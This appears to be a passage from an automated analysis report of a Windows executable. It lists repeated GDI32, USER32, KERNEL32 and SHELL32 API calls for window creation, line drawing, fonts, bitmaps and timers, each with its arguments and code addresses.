LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
LineTo.GDI32(0044A654,?,?), ref: 0040B727
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
LoadIconA.USER32(00000000), ref: 0040B7F6
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
GetClientRect.USER32(00000000,?), ref: 0040B849
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
LoadIconA.USER32(00000000), ref: 0040BC9C
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
GetClientRect.USER32(00000000,?), ref: 0040BCEF
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
LoadBitmapA.USER32(00000000), ref: 0040BD75
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
LoadIconA.USER32(00000000), ref: 0040BE92
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
GetClientRect.USER32(00000000,?), ref: 0040BEE3
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
LoadBitmapA.USER32(00000000), ref: 0040BF69
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
SetTextColor.GDI32(0044A655,?), ref: 0040C05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
GetClientRect.USER32(0044A660,?), ref: 0040C0C1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
LoadIconA.USER32(00000000,00007F02), ref: 0040C171
GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
LoadIconA.USER32(00000000), ref: 0040C19D
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
GetClientRect.USER32(00000000,?), ref: 0040C1F0
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
SetTextColor.GDI32(0044A655,?), ref: 0040C385
CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
SetTextColor.GDI32(0044A655,?), ref: 0040C465
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
LineTo.GDI32(0044A654,?,?), ref: 0040C557
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
GetClientRect.USER32(0044A660,?), ref: 0040C5C8
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
LoadIconA.USER32(00000000,00007F02), ref: 0040C748
GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
LoadIconA.USER32(00000000), ref: 0040C774
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
GetClientRect.USER32(00000000,?), ref: 0040C7C7
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
LoadBitmapA.USER32(00000000), ref: 0040C84D
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
GetClientRect.USER32(0044A660,?), ref: 0040C8E1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
GetClientRect.USER32(0044A660,?), ref: 0040CA25
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
LoadIconA.USER32(00000000), ref: 0040CBA1
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
GetClientRect.USER32(00000000,?), ref: 0040CBF4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
LoadBitmapA.USER32(00000000), ref: 0040CC7A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
SetTextColor.GDI32(0044A655,?), ref: 0040CD63
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
GetClientRect.USER32(0044A660,?), ref: 0040CE92
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
SelectObject.GDI32(0044A655,00000000), ref: 0040D044
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
SetTextColor.GDI32(0044A655,?), ref: 0040D05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
GetClientRect.USER32(0044A660,?), ref: 0040D0B7
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
SelectObject.GDI32(0044A655,00000000), ref: 0040D269
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
SetTextColor.GDI32(0044A655,?), ref: 0040D283
CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
SetTextColor.GDI32(0044A655,?), ref: 0040D349
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
LoadIconA.USER32(00000000,00007F02), ref: 0040D491
GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
LoadIconA.USER32(00000000), ref: 0040D4BD
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
GetClientRect.USER32(00000000,?), ref: 0040D510
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
LoadBitmapA.USER32(00000000), ref: 0040D596
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
GetClientRect.USER32(0044A660,?), ref: 0040D69C
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
SetTextColor.GDI32(0044A655,?), ref: 0040D786
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
LoadIconA.USER32(00000000,00007F02), ref: 0040D835
GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
LoadIconA.USER32(00000000), ref: 0040D861
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
GetClientRect.USER32(00000000,?), ref: 0040D8B4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
LoadBitmapA.USER32(00000000), ref: 0040D93A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
GetClientRect.USER32(0044A660,?), ref: 0040D9CE
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
LoadIconA.USER32(00000000), ref: 0040DB57
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
GetClientRect.USER32(00000000,?), ref: 0040DBAA
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
LoadBitmapA.USER32(00000000), ref: 0040DC30
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
GetClientRect.USER32(0044A660,?), ref: 0040DDA1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
LoadIconA.USER32(00000000), ref: 0040DE71
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
GetClientRect.USER32(00000000,?), ref: 0040DEC4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
LoadBitmapA.USER32(00000000), ref: 0040DF4A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
LineTo.GDI32(0044A654,?,?), ref: 0040E05E
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
LoadIconA.USER32(00000000), ref: 0040E114
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
GetClientRect.USER32(00000000,?), ref: 0040E167
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
LoadBitmapA.USER32(00000000), ref: 0040E1F4
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
GetClientRect.USER32(0044A660,?), ref: 0040E363
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
SelectObject.GDI32(0044A655,00000000), ref: 0040E447
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
SetTextColor.GDI32(0044A655,?), ref: 0040E461
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
GetClientRect.USER32(0044A660,?), ref: 0040E502
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
LoadIconA.USER32(00000000), ref: 0040E606
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
GetClientRect.USER32(00000000,?), ref: 0040E657
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
SHGetMalloc.SHELL32(?), ref: 0040E817
SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
KillTimer.USER32(00000000,00000000), ref: 0040EB99
BeginPaint.USER32(0044A660,?), ref: 0040EBAE
IsRectEmpty.USER32(?), ref: 0040EBBC
GetSystemTime.KERNEL32(?), ref: 0040EBCE
SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
EndPaint.USER32(0044A660,?), ref: 0040EBF4
GetClientRect.USER32(0044A660,?), ref: 0040EC12
